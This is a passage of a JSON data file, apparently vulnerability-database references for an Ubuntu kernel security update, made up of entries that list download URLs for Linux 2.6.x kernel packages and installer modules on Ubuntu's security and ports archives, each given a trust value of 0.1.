        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-19.61_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-rt_2.6.24-28.70_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-qcm-msm/linux-qcm-msm_2.6.31.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-28.70_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.32-22.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-19.61.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-server_2.6.24-28.70_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ti-omap/linux-ti-omap_2.6.33-501.7.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-virtual_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.84_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-19.61_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.84_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-386_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc-smp_2.6.31-22.60_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.84_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-22.60.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-generic_2.6.28-19.61_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-generic_2.6.24-28.70_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic_2.6.31-22.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.84_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.84_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-28.70_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-generic_2.6.28-19.61_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.84_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-sparc64_2.6.24-28.70_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-xen_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-386_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc_2.6.31-22.60_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-rt_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-lpia_2.6.31-22.60_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-386_2.6.32-22.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-server_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-19-lpia_2.6.28-19.61_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.84_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-openvz_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.84_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic_2.6.32-22.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
